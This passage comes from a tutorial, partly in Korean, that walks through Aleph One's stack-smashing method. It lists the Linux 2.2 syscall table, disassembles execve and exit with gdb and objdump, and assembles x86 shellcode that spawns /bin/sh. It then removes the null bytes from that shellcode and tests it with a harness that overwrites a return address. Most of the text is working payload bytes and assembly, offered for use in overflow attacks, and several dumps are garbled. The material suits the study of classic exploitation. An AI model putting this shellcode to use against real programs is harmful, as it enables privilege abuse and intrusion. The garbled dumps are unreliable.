74 .endr 위의내용을보기쉽게표로정리하면다음과같다. 아래의자료는인터넷상에서구한 것 20 으로커널 2.2 버전에서추출한것이다. 쉘코드를만들때사용되는것에는색깔을넣었다. %eax Name Source %ebx %ecx %edx 1 sys_exit kernel/exit.c int sys_fork arch/i386/kernel/process.c struct pt_regs sys_read fs/read_write.c unsigned int char * size_t 4 sys_write fs/read_write.c unsigned int const char * size_t 5 sys_open fs/open.c const char * int int 6 sys_close fs/open.c unsigned int sys_waitpid kernel/exit.c pid_t unsigned int * int 8 sys_creat fs/open.c const char * int - 9 sys_link fs/namei.c const char * const char * - 10 sys_unlink fs/namei.c const char * sys_execve arch/i386/kernel/process.c struct pt_regs sys_chdir fs/open.c const char * sys_time kernel/time.c int * sys_mknod fs/namei.c const char * int dev_t 15 sys_chmod fs/open.c const char * mode_t - 16 sys_lchown fs/open.c const char * uid_t gid_t 18 sys_stat fs/stat.c char * struct old_kernel_stat * - 19 sys_lseek fs/read_write.c unsigned int off_t unsigned int 20 sys_getpid kernel/sched.c sys_mount fs/super.c char * char * char * 22 sys_oldumount fs/super.c char * sys_setuid kernel/sys.c uid_t sys_getuid kernel/sched.c sys_stime kernel/time.c int * sys_ptrace arch/i386/kernel/ptrace.c long long long

75 27 sys_alarm kernel/sched.c unsigned int sys_fstat fs/stat.c unsigned int struct old_kernel_stat * - 29 sys_pause arch/i386/kernel/sys_i386.c sys_utime fs/open.c char * struct utimbuf * - 33 sys_access fs/open.c const char * int - 34 sys_nice kernel/sched.c int sys_sync fs/buffer.c sys_kill kernel/signal.c int int - 38 sys_rename fs/namei.c const char * const char * - 39 sys_mkdir fs/namei.c const char * int - 40 sys_rmdir fs/namei.c const char * sys_dup fs/fcntl.c unsigned int sys_pipe arch/i386/kernel/sys_i386.c unsigned long * sys_times kernel/sys.c struct tms * sys_brk mm/mmap.c unsigned long sys_setgid kernel/sys.c gid_t sys_getgid kernel/sched.c sys_signal kernel/signal.c int sighandler_t - 49 sys_geteuid kernel/sched.c sys_getegid kernel/sched.c sys_acct kernel/acct.c const char * sys_umount fs/super.c char * int - 54 sys_ioctl fs/ioctl.c unsigned int unsigned int unsigned long 55 sys_fcntl fs/fcntl.c unsigned int unsigned int unsigned long 57 sys_setpgid kernel/sys.c pid_t pid_t - 59 sys_olduname arch/i386/kernel/sys_i386.c struct oldold_utsname * sys_umask kernel/sys.c int sys_chroot fs/open.c const char * sys_ustat fs/super.c dev_t struct ustat * - 63 sys_dup2 fs/fcntl.c unsigned int unsigned int - 64 sys_getppid kernel/sched.c sys_getpgrp kernel/sys.c sys_setsid kernel/sys.c

76 67 sys_sigaction arch/i386/kernel/signal.c int const struct old_sigaction * 68 sys_sgetmask kernel/signal.c sys_ssetmask kernel/signal.c int sys_setreuid kernel/sys.c uid_t uid_t - 71 sys_setregid kernel/sys.c gid_t gid_t - struct old_sigaction * 72 sys_sigsuspend arch/i386/kernel/signal.c int int old_sigset_t 73 sys_sigpending kernel/signal.c old_sigset_t * sys_sethostname kernel/sys.c char * int - 75 sys_setrlimit kernel/sys.c unsigned int struct rlimit * - 76 sys_getrlimit kernel/sys.c unsigned int struct rlimit * - 77 sys_getrusage kernel/sys.c int struct rusage * - 78 sys_gettimeofday kernel/time.c struct timeval * struct timezone * - 79 sys_settimeofday kernel/time.c struct timeval * struct timezone * - 80 sys_getgroups kernel/sys.c int gid_t * - 81 sys_setgroups kernel/sys.c int gid_t * - 82 old_select arch/i386/kernel/sys_i386.c struct sel_arg_struct * sys_symlink fs/namei.c const char * const char * - 84 sys_lstat fs/stat.c char * struct old_kernel_stat * - 85 sys_readlink fs/stat.c const char * char * int 86 sys_uselib fs/exec.c const char * sys_swapon mm/swapfile.c const char * int - 88 sys_reboot kernel/sys.c int int int 89 old_readdir fs/readdir.c unsigned int void * unsigned int 90 old_mmap arch/i386/kernel/sys_i386.c struct mmap_arg_struct * sys_munmap mm/mmap.c unsigned long size_t - 92 sys_truncate fs/open.c const char * unsigned long - 93 sys_ftruncate fs/open.c unsigned int unsigned long - 94 sys_fchmod fs/open.c unsigned int mode_t - 95 sys_fchown fs/open.c unsigned int uid_t gid_t 96 sys_getpriority kernel/sys.c int int - 97 sys_setpriority kernel/sys.c int int int 99 sys_statfs fs/open.c const char * struct statfs * - 75

77 100 sys_fstatfs fs/open.c unsigned int struct statfs * sys_ioperm arch/i386/kernel/ioport.c unsigned long unsigned long int 102 sys_socketcall net/socket.c int unsigned long * sys_syslog kernel/printk.c int char * int 104 sys_setitimer kernel/itimer.c int struct itimerval * struct itimerval * 105 sys_getitimer kernel/itimer.c int struct itimerval * sys_newstat fs/stat.c char * struct stat * sys_newlstat fs/stat.c char * struct stat * sys_newfstat fs/stat.c unsigned int struct stat * sys_uname arch/i386/kernel/sys_i386.c struct old_utsname * sys_iopl arch/i386/kernel/ioport.c unsigned long sys_vhangup fs/open.c sys_idle arch/i386/kernel/process.c sys_vm86old arch/i386/kernel/vm86.c unsigned long struct vm86plus_struct * 114 sys_wait4 kernel/exit.c pid_t unsigned long * int options 115 sys_swapoff mm/swapfile.c const char * sys_sysinfo kernel/info.c struct sysinfo * sys_ipc arch/i386/kernel/sys_i386.c uint int int 118 sys_fsync fs/buffer.c unsigned int sys_sigreturn arch/i386/kernel/signal.c unsigned long sys_clone arch/i386/kernel/process.c struct pt_regs sys_setdomainname kernel/sys.c char * int sys_newuname kernel/sys.c struct new_utsname * sys_modify_ldt arch/i386/kernel/ldt.c int void * unsigned long 124 sys_adjtimex kernel/time.c struct timex * sys_mprotect mm/mprotect.c unsigned long size_t unsigned long 126 sys_sigprocmask kernel/signal.c int old_sigset_t * old_sigset_t * 127 sys_create_module kernel/module.c const char * size_t sys_init_module kernel/module.c const char * struct module * sys_delete_module kernel/module.c const char * sys_get_kernel_syms kernel/module.c struct kernel_sym * sys_quotactl fs/dquot.c int const char * int 132 sys_getpgid kernel/sys.c pid_t

78 133 sys_fchdir fs/open.c unsigned int sys_bdflush fs/buffer.c int long sys_sysfs fs/super.c int unsigned long unsigned long 136 sys_personality kernel/exec_domain.c unsigned long sys_setfsuid kernel/sys.c uid_t sys_setfsgid kernel/sys.c gid_t sys_llseek fs/read_write.c unsigned int unsigned long unsigned long 141 sys_getdents fs/readdir.c unsigned int void * unsigned int 142 sys_select fs/select.c int fd_set * fd_set * 143 sys_flock fs/locks.c unsigned int unsigned int sys_msync mm/filemap.c unsigned long size_t int 145 sys_readv fs/read_write.c unsigned long const struct iovec * unsigned long 146 sys_writev fs/read_write.c unsigned long const struct iovec * unsigned long 147 sys_getsid kernel/sys.c pid_t sys_fdatasync fs/buffer.c unsigned int sys_sysctl kernel/sysctl.c struct sysctl_args * sys_mlock mm/mlock.c unsigned long size_t sys_munlock mm/mlock.c unsigned long size_t sys_mlockall mm/mlock.c int sys_munlockall mm/mlock.c sys_sched_setparam kernel/sched.c pid_t struct sched_param * sys_sched_getparam kernel/sched.c pid_t struct sched_param * sys_sched_setscheduler kernel/sched.c pid_t int 157 sys_sched_getscheduler kernel/sched.c pid_t sys_sched_yield kernel/sched.c sys_sched_get_priority_max kernel/sched.c int sys_sched_get_priority_min kernel/sched.c int sys_sched_rr_get_interval kernel/sched.c pid_t struct timespec * sys_nanosleep kernel/sched.c struct timespec * struct timespec - struct sched_param * 163 sys_mremap mm/mremap.c unsigned long unsigned long unsigned long 164 sys_setresuid kernel/sys.c uid_t uid_t uid_t 165 sys_getresuid kernel/sys.c uid_t * uid_t * uid_t * 166 sys_vm86 arch/i386/kernel/vm86.c struct vm86_struct * sys_query_module kernel/module.c const char * int char * 77

    168  sys_poll             fs/select.c                struct pollfd *     unsigned int               long
    169  sys_nfsservctl       fs/filesystems.c           int                 void *                     void *
    170  sys_setresgid        kernel/sys.c               gid_t               gid_t                      gid_t
    171  sys_getresgid        kernel/sys.c               gid_t *             gid_t *                    gid_t *
    172  sys_prctl            kernel/sys.c               int                 unsigned long              unsigned long
    173  sys_rt_sigreturn     arch/i386/kernel/signal.c  unsigned long       -                          -
    174  sys_rt_sigaction     kernel/signal.c            int                 const struct sigaction *   struct sigaction *
    175  sys_rt_sigprocmask   kernel/signal.c            int                 sigset_t *                 sigset_t *
    176  sys_rt_sigpending    kernel/signal.c            sigset_t *          size_t                     -
    177  sys_rt_sigtimedwait  kernel/signal.c            const sigset_t *    siginfo_t *                const struct timespec *
    178  sys_rt_sigqueueinfo  kernel/signal.c            int                 int                        siginfo_t *
    179  sys_rt_sigsuspend    arch/i386/kernel/signal.c  sigset_t *          size_t                     -
    180  sys_pread            fs/read_write.c            unsigned int        char *                     size_t
    181  sys_pwrite           fs/read_write.c            unsigned int        const char *               size_t
    182  sys_chown            fs/open.c                  const char *        uid_t                      gid_t
    183  sys_getcwd           fs/dcache.c                char *              unsigned long              -
    184  sys_capget           kernel/capability.c        cap_user_header_t   cap_user_data_t            -
    185  sys_capset           kernel/capability.c        cap_user_header_t   const cap_user_data_t      -
    186  sys_sigaltstack      arch/i386/kernel/signal.c  const stack_t *     stack_t *                  -
    187  sys_sendfile         mm/filemap.c               int                 int                        off_t *
    190  sys_vfork            arch/i386/kernel/process.c struct pt_regs      -                          -

Returning to the disassembly of execve():

    0x80002c5 <__execve+9>:    movl   0x8(%ebp),%ebx

Copies the first argument, the address of "/bin/sh", into ebx.

    0x80002c8 <__execve+12>:   movl   0xc(%ebp),%ecx

Copies the second argument, the address of name[], into ecx.

    0x80002cb <__execve+15>:   movl   0x10(%ebp),%edx

Copies the third argument, the null pointer, into edx.

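    0x80002ce <__execve+18>:   int    $0x80

This switches to kernel mode. The point was touched on in footnote 19, but to elaborate: the int in int $0x80 is not the integer type used when declaring variables in a program. It is the x86 instruction that raises a software interrupt. On Linux, interrupt vector 0x80 is the system call entry point: the processor switches to kernel mode and the kernel dispatches the system call selected by the number in eax, which here is execve(). In short, Linux on x86 uses int $0x80 to execute a system call.

What happens during the execve() system call can be summarized as follows.

a) Have the null-terminated string "/bin/sh" somewhere in memory: name[0] = "/bin/sh";
b) Have the address of the string "/bin/sh" somewhere in memory, followed by a null long word: name[0] is a pointer (char *name[2])
c) Copy 0xb into the eax register: movl $0xb,%eax
d) Copy the address of the string "/bin/sh" into the ebx register: movl 0x8(%ebp),%ebx
e) Copy the address of the address of the string "/bin/sh" (that is, the address of name[]) into the ecx register: movl 0xc(%ebp),%ecx
f) Copy the address of the null long word into the edx register: movl 0x10(%ebp),%edx
g) Execute the int $0x80 instruction: int $0x80

If the execve() call fails, however, the program keeps fetching instructions from the stack, which may contain arbitrary data, and it will most likely dump core. To avoid this, an exit() system call should be added after it. The exit() system call looks like this.

exit.c

    #include <stdlib.h>

    void main() {
        exit(0);
    }

Compiling it and examining it with gdb gives the following.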

    [aleph1]$ gcc -o exit -static exit.c
    [aleph1]$ gdb exit
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
    (no debugging symbols found)...
    (gdb) disassemble _exit
    Dump of assembler code for function _exit:
    0x800034c <_exit>:      pushl  %ebp
    0x800034d <_exit+1>:    movl   %esp,%ebp
    0x800034f <_exit+3>:    pushl  %ebx
    0x8000350 <_exit+4>:    movl   $0x1,%eax
    0x8000355 <_exit+9>:    movl   0x8(%ebp),%ebx
    0x8000358 <_exit+12>:   int    $0x80
    0x800035a <_exit+14>:   movl   0xfffffffc(%ebp),%ebx
    0x800035d <_exit+17>:   movl   %ebp,%esp
    0x800035f <_exit+19>:   popl   %ebp
    0x8000360 <_exit+20>:   ret
    0x8000361 <_exit+21>:   nop
    0x8000362 <_exit+22>:   nop
    0x8000363 <_exit+23>:   nop
    End of assembler dump.

The exit system call places 0x1 in the eax register, places the exit code in the ebx register, and then executes int $0x80. Why 0x1 goes into eax is easy to see from the syscall table shown earlier: sys_exit is system call number 1. Most applications return 0 when they terminate without error, so 0 is placed in ebx. Combining this with the earlier steps gives the following.

a) Have the null-terminated string "/bin/sh" somewhere in memory: name[0] = "/bin/sh";
b) Have the address of the string "/bin/sh" somewhere in memory, followed by a null long word: name[0] is a pointer (char *name[2])
c) Copy 0xb into the eax register: movl $0xb,%eax
d) Copy the address of the string "/bin/sh" into the ebx register: movl 0x8(%ebp),%ebx
e) Copy the address of the address of the string "/bin/sh" into the ecx register: movl 0xc(%ebp),%ecx
f) Copy the address of the null long word into the edx register: movl 0x10(%ebp),%edx
g) Execute the int $0x80 instruction: int $0x80
h) Copy 0x1 into the eax register: movl $0x1,%eax
i) Copy 0x0 into the ebx register: movl $0x0,%ebx
j) Execute the int $0x80 instruction: int $0x80

What remains is to put these together in assembly language. The things to remember are that the string is placed after the code, and that the address of the string and the null word are placed after the string. The result looks like this:

    movl   string_addr,string_addr_addr
    movb   $0x0,null_byte_addr
    movl   $0x0,null_addr
    movl   $0xb,%eax
    movl   string_addr,%ebx
    leal   string_addr,%ecx
    leal   null_string,%edx
    int    $0x80
    movl   $0x1, %eax
    movl   $0x0, %ebx
    int    $0x80
    /bin/sh string goes here (because the string follows the code)

The problem now is that we do not know where in the memory space of the vulnerable program the code above, and the string "/bin/sh" that follows it, will be placed. One way around this is to use the JMP and CALL instructions. JMP and CALL can use IP-relative addressing, which lets us jump to an offset from the current IP without knowing the exact address we want to jump to. If we place a CALL instruction right before the "/bin/sh" string, and a JMP instruction that jumps to that CALL, the address of the string is pushed onto the stack as the return address when the CALL executes. All that is then needed is to copy that return address into a register. The CALL instruction can simply call the start of the code above. Writing J for the JMP instruction, C for the CALL instruction, and s for the string, the execution flow is as follows.

    bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
    memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
               buffer                sfp   ret   a     b     c

    <------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
               ^|^             ^|            |
               |||_____________||____________| (1)
           (2)  ||_____________||
                 |______________| (3)
    top of                                                            bottom of
    stack                                                                 stack

Taking this revised layout as a reference and noting how many bytes each instruction occupies gives:

    jmp    offset-to-call           # 2 bytes
    popl   %esi                     # 1 byte
    movl   %esi,array-offset(%esi)  # 3 bytes
    movb   $0x0,nullbyteoffset(%esi)# 4 bytes
    movl   $0x0,null-offset(%esi)   # 7 bytes
    movl   $0xb,%eax                # 5 bytes
    movl   %esi,%ebx                # 2 bytes
    leal   array-offset(%esi),%ecx  # 3 bytes
    leal   null-offset(%esi),%edx   # 3 bytes
    int    $0x80                    # 2 bytes
    movl   $0x1, %eax               # 5 bytes
    movl   $0x0, %ebx               # 5 bytes
    int    $0x80                    # 2 bytes
    call   offset-to-popl           # 5 bytes
    /bin/sh string goes here.

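Calculating the offsets from jmp to call, from call to popl, from the string address to the array, and from the string address to the null long word gives:

    jmp    0x26                     # 2 bytes
    popl   %esi                     # 1 byte
    movl   %esi,0x8(%esi)           # 3 bytes
    movb   $0x0,0x7(%esi)           # 4 bytes
    movl   $0x0,0xc(%esi)           # 7 bytes
    movl   $0xb,%eax                # 5 bytes
    movl   %esi,%ebx                # 2 bytes
    leal   0x8(%esi),%ecx           # 3 bytes
    leal   0xc(%esi),%edx           # 3 bytes
    int    $0x80                    # 2 bytes
    movl   $0x1, %eax               # 5 bytes
    movl   $0x0, %ebx               # 5 bytes
    int    $0x80                    # 2 bytes
    call   -0x2b                    # 5 bytes
    .string \"/bin/sh\"             # 8 bytes

(The values 0x26 and -0x2b are the ones given in Aleph One's text. Summing the byte counts puts the call 0x2a bytes past the end of the jmp, and the popl 0x2f bytes before the end of the call, which are the values used in shellcodeasm.c.)

Now we compile and run it to check that it works correctly. There is one problem, however: the code modifies itself, and most operating systems mark code pages read-only. To get around this restriction, we place the code we want to execute in the stack or the data segment and transfer control to it. To do so, we put the code in a global array in the data segment. For that we first need the hexadecimal representation of the binary code, so we compile it and use gdb to obtain it.

shellcodeasm.c

    void main() {
    asm ("
            jmp    0x2a                     # 2 bytes
            popl   %esi                     # 1 byte
            movl   %esi,0x8(%esi)           # 3 bytes
            movb   $0x0,0x7(%esi)           # 4 bytes
            movl   $0x0,0xc(%esi)           # 7 bytes
            movl   $0xb,%eax                # 5 bytes
            movl   %esi,%ebx                # 2 bytes
            leal   0x8(%esi),%ecx           # 3 bytes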

85 "); leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2f # 5 bytes.string \"/bin/sh\" # 8 bytes [aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c [aleph1]$ gdb shellcodeasm GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... disassemble main Dump of assembler code for function main: 0x <main>: pushl %ebp 0x <main+1>: movl %esp,%ebp 0x <main+3>: jmp 0x800015f <main+47> 0x <main+5>: popl %esi 0x <main+6>: movl %esi,0x8(%esi) 0x <main+9>: movb $0x0,0x7(%esi) 0x800013d <main+13>: movl $0x0,0xc(%esi) 0x <main+20>: movl $0xb,%eax 0x <main+25>: movl %esi,%ebx 0x800014b <main+27>: leal 0x8(%esi),%ecx 0x800014e <main+30>: leal 0xc(%esi),%edx 0x <main+33>: int $0x80 0x <main+35>: movl $0x1,%eax 0x <main+40>: movl $0x0,%ebx 0x800015d <main+45>: int $0x80 0x800015f <main+47>: call 0x <main+5> 0x <main+52>: das 0x <main+53>: boundl 0x6e(%ecx),%ebp 0x <main+56>: das 0x <main+57>: jae 0x80001d3 < new_exitfn+55> 0x800016b <main+59>: addb %cl,0x55c35dec(%ecx) End of assembler dump. x/bx main+3 0x <main+3>: 0xeb 0x <main+4>: 0x2a 84

    ...

Using the bytes extracted this way, we build the shellcode.

testsc.c

    char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

    void main() {
        int *ret;               /* int pointer used to overwrite main()'s
                                   return address */
        ret = (int *)&ret + 2;  /* point ret two ints above its own address,
                                   at main()'s saved return address */
        (*ret) = (int)shellcode;/* store the address of shellcode there, so
                                   that shellcode runs when main() returns */
    }

Compiling and running it shows that it works:

    [aleph1]$ gcc -o testsc testsc.c
    [aleph1]$ ./testsc
    $ exit
    [aleph1]$

There is one obstacle, however. What we usually attack is a character array, and string functions treat a null byte (0x00) in the shellcode as the end of the string, so copying the shellcode to its destination stops at that point. Readers with a basic knowledge of C will already know this. The shellcode must therefore contain no 0x00 bytes, and the null bytes have to be eliminated.

    Problem instruction:             Substitute with (null bytes removed):
    --------------------------------------------------------------
    movb   $0x0,0x7(%esi)            xorl   %eax,%eax
    movl   $0x0,0xc(%esi)            movb   %al,0x7(%esi)
                                     movl   %eax,0xc(%esi)
    --------------------------------------------------------------
    movl   $0xb,%eax                 movb   $0xb,%al
    --------------------------------------------------------------
    movl   $0x1, %eax                xorl   %ebx,%ebx
    movl   $0x0, %ebx                movl   %ebx,%eax
                                     inc    %eax
    --------------------------------------------------------------

Let us remove the null bytes in the first group. This may look difficult to beginners, but it is quite simple. First we need the xor instruction. XORing a register with itself always yields zero, so xorl %eax,%eax clears eax without a literal 0 appearing in the code. We clear eax this way and then store it at offsets 0x7 and 0xc from esi. In order:

1. Zero eax without using the immediate $0x0: xorl %eax,%eax
2. Store the low byte of the zeroed register at 0x7(%esi): movb %al,0x7(%esi)
3. Store the zeroed eax at 0xc(%esi): movl %eax,0xc(%esi)

Next we fix movl $0xb,%eax. Some readers may find it odd that this instruction needs changing. In Aleph One's text the problem is visible only in the extracted bytes, char shellcode[] = "\xeb\x2a\x5e\x89\x76 ... \x5d\xc3";, so its location is hard to pin down. Dumping the binary with objdump shows that movl $0xb,%eax is encoded as b8 0b 00 00 00. In other words, it contains null bytes: the 32-bit immediate 0x0000000b is stored in full, and its three upper bytes are zero. Because no literal 0x0 appears in the source here, the xor trick does not apply. Instead we change %eax to %al. Since eax was already cleared by the xorl above, writing 0xb into its low byte leaves eax equal to 0xb.

This is a good place to briefly revisit the registers covered in the section on the stack region. The Intel 8086 had 16-bit registers such as ax, bx, and cx; with the 80386 they became 32 bits wide, and the names changed to eax, ebx, ecx, and so on. The leading e means that the register corresponding to the 16-bit 8086 register has been extended to 32 bits on the 80386. The x at the end of ax or eax is also usually read as "extended": a 16-bit register is made up of two 8-bit halves, so AX consists of AH and AL, where H means high and L means low. Returning to the code, we narrow the destination of movl $0xb,%eax to %al, giving movb $0xb,%al. As you will remember, $0xb is the number of the execve() system call in the syscall table.

Only the last problem group remains: movl $0x1, %eax and movl $0x0, %ebx. Here too the null bytes show up only in the shellcode bytes of Aleph One's text, not in the gdb output, which tends to confuse beginners. We fix it the same way:

1. Zero ebx without using the immediate $0x0: xorl %ebx,%ebx
2. Copy the cleared %ebx into %eax: movl %ebx,%eax
3. Increment %eax by 1: inc %eax

We now have code with none of these problems. Put together:

shellcodeasm2.c

    void main() {
    asm ("
            jmp    0x1f                     # 2 bytes
            popl   %esi                     # 1 byte
            movl   %esi,0x8(%esi)           # 3 bytes
            xorl   %eax,%eax                # 2 bytes
            movb   %al,0x7(%esi)            # 3 bytes
            movl   %eax,0xc(%esi)           # 3 bytes
            movb   $0xb,%al                 # 2 bytes
            movl   %esi,%ebx                # 2 bytes
            leal   0x8(%esi),%ecx           # 3 bytes
            leal   0xc(%esi),%edx           # 3 bytes
            int    $0x80                    # 2 bytes
            xorl   %ebx,%ebx                # 2 bytes
            movl   %ebx,%eax                # 2 bytes
            inc    %eax                     # 1 bytes
            int    $0x80                    # 2 bytes
            call   -0x24                    # 5 bytes
            .string \"/bin/sh\"             # 8 bytes
                                            # 46 bytes total
    ");
    }

Compiling this code and extracting the shellcode in the same way as before gives the following. The null bytes are gone from this shellcode.

    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Using the extracted shellcode, we write the following program to launch a shell. Compiled and run, it starts a shell as expected, and the shellcode can now be used in an overflow attack.

testsc2.c

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    void main() {
        int *ret;

        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
    }

    [aleph1]$ gcc -o testsc2 testsc2.c
    [aleph1]$ ./testsc2
    $ exit
    [aleph1]$

Next I apply Aleph One's method on my own system as it stands, and then briefly describe a simpler way to build shellcode. Aleph One's method has already been explained in enough detail, so we go straight to the hands-on part. The assembly code that launches a shell is as follows.

            jmp    callz
    start:  popl   %esi
            movl   %esi,0x8(%esi)
            movb   $0x0,0x7(%esi)
            movl   $0x0,0xc(%esi)
            movl   $0xb,%eax
            movl   %esi,%ebx
            leal   0x8(%esi),%ecx
            leal   0xc(%esi),%edx
            int    $0x80
            movl   $0x1,%eax
            movl   $0x0,%ebx
            int    $0x80
    callz:  call   start
            .string \"/bin/sh\"

    [vangelis@localhost test]$ vi shellcodemake1.c

    #include <stdio.h>

    void main() {
    asm ("
            jmp    callz
    start:  popl   %esi
            movl   %esi,0x8(%esi)
            movb   $0x0,0x7(%esi)
            movl   $0x0,0xc(%esi)
            movl   $0xb,%eax

91 movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1,%eax movl $0x0,%ebx int $0x80 callz: call start.string "/bin/sh " "); test]$ gcc o shellcodemake1 shellcodemake1.c shellcodemake1.c: In function `main': shellcodemake1.c:4: warning: return type of `main' is not `int' [vangelis@localhost test]$ gdb shellcodemake1 GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %esp,%ebp 0x <main+3>: jmp 0x804845f <callz> 0x <start>: pop %esi 0x <start+1>: mov %esi,0x8(%esi) 0x <start+4>: movb $0x0,0x7(%esi) 0x804843d <start+8>: movl $0x0,0xc(%esi) 90

92 0x <start+15>: mov $0xb,%eax 0x <start+20>: mov %esi,%ebx 0x804844b <start+22>: lea 0x8(%esi),%ecx 0x804844e <start+25>: lea 0xc(%esi),%edx 0x <start+28>: int $0x80 0x <start+30>: mov $0x1,%eax 0x <start+35>: mov $0x0,%ebx 0x804845d <start+40>: int $0x80 0x804845f <callz>: call 0x <start> 0x <callz+5>: das 0x <callz+6>: bound %ebp,0x6e(%ecx) 0x <callz+9>: das 0x <callz+10>: jae 0x80484d3 <_fp_hw+3> 0x804846b <callz+12>: add %bl,0xffffffc3(%ebp) End of assembler dump. x/bx main+3 0x <main+3>: 0xeb 0x <main+4>: 0x2a 0x <start>: 0x5e 0x <start+1>: 0x89 0x <start+2>: 0x76 0x <start+3>: 0x08 0x <start+4>: 0xc6 0x804843a <start+5>: 0x46 0x804843b <start+6>: 0x07 0x804843c <start+7>: 0x00 0x804843d <start+8>: 0xc7 0x804843e <start+9>: 0x46 91

93 0x804843f <start+10>: 0x0c 0x <start+11>: 0x00 0x <start+12>: 0x00 0x <start+13>: 0x00 0x <start+14>: 0x00 0x <start+15>: 0xb8 0x <start+16>: 0x0b 0x <start+17>: 0x00 0x <start+18>: 0x00 0x <start+19>: 0x00 0x <start+20>: 0x89 0x804844a <start+21>: 0xf3 0x804844b <start+22>: 0x8d 0x804844c <start+23>: 0x4e 0x804844d <start+24>: 0x08 0x804844e <start+25>: 0x8d 0x804844f <start+26>: 0x56 0x <start+27>: 0x0c 0x <start+28>: 0xcd 0x <start+29>: 0x80 0x <start+30>: 0xb8 0x <start+31>: 0x01 0x <start+32>: 0x00 92

94 0x <start+33>: 0x00 0x <start+34>: 0x00 0x <start+35>: 0xbb 0x <start+36>: 0x00 0x804845a <start+37>: 0x00 0x804845b <start+38>: 0x00 0x804845c <start+39>: 0x00 0x804845d <start+40>: 0xcd 0x804845e <start+41>: 0x80 0x804845f <callz>: 0xe8 0x <callz+1>: 0xd1 0x <callz+2>: 0xff 0x <callz+3>: 0xff 0x <callz+4>: 0xff 0x <callz+5>: 0x2f 0x <callz+6>: 0x62 0x <callz+7>: 0x69 : 위의결과를보면알수있듯이 gdb를사용하여추출한것은그내용을알아보기도힘들고한라인에하나씩나오기때문에정리하기가불편하다. 그래서이불편함을덜기위해 objdump라는명령을사용해정리해보는것이더간편할것같다. objdump를이용하면다음과같다. 물론결과는같다. [vangelis@localhost test]$ objdump -d shellcodemake1 more 93

95 -- 중략 <main>: : 55 push %ebp : 89 e5 mov %esp,%ebp : eb 2a jmp f <callz> <start>: : 5e pop %esi : mov %esi,0x8(%esi) : c movb $0x0,0x7(%esi) d: c7 46 0c movl $0x0,0xc(%esi) : b8 0b mov $0xb,%eax : 89 f3 mov %esi,%ebx b: 8d 4e 08 lea 0x8(%esi),%ecx e: 8d 56 0c lea 0xc(%esi),%edx : cd 80 int $0x : b mov $0x1,%eax : bb mov $0x0,%ebx d: cd 80 int $0x f <callz>: f: e8 d1 ff ff ff call <start> : 2f das : e bound %ebp,0x6e(%ecx) : 2f das : jae 80484d3 <_fp_hw+0x3> b: 00 5d c3 add %bl,0xffffffc3(%ebp) e: 89 f6 mov %esi,%esi -- 중략 -- test]$ gdb를이용한것보다쉘코드의내용을알아보기가더쉽다. 이제부터는 objdump를 gdb 대신 94

96 사용하기로하겠다. 이제나온코드를정리를해보자. 색깔이들어가있는부분이다 "\xeb\x2a" "\x5e" "\x89\x76\x08" "\xc6\x46\x07\x00" "\xc7\x46\x0c\x00\x00\x00\x00" "\xb8\x0b\x00\x00\x00" "\x89\xf3" "\x8d\x4e\x08" "\x8d\x56\x0c" "\xcd\x80" "\xb8\x01\x00\x00\x00" "\xbb\x00\x00\x00\x00" "\xcd\x80" "\xe8\xd1\xff\xff\xff/bin/sh"; 그런데이코드를실행하면쉘을떨어지지만한가지중대한문제가있음을알수있다. 먼저 제대로작동하는지확인해보자. test]$ vi shellcode1.c char shellcode[]= "\xeb\x2a" /* jmp f <callz> */ "\x5e" /* pop %esi */ "\x89\x76\x08" /* mov %esi,0x8(%esi) */ "\xc6\x46\x07\x00" /* movb $0x0,0x7(%esi) */ "\xc7\x46\x0c\x00\x00\x00\x00" /* movl $0x0,0xc(%esi) */ "\xb8\x0b\x00\x00\x00" /* mov $0xb,%eax */ "\x89\xf3" /* mov %esi,%ebx */ "\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* lea 0xc(%esi),%edx */ 95

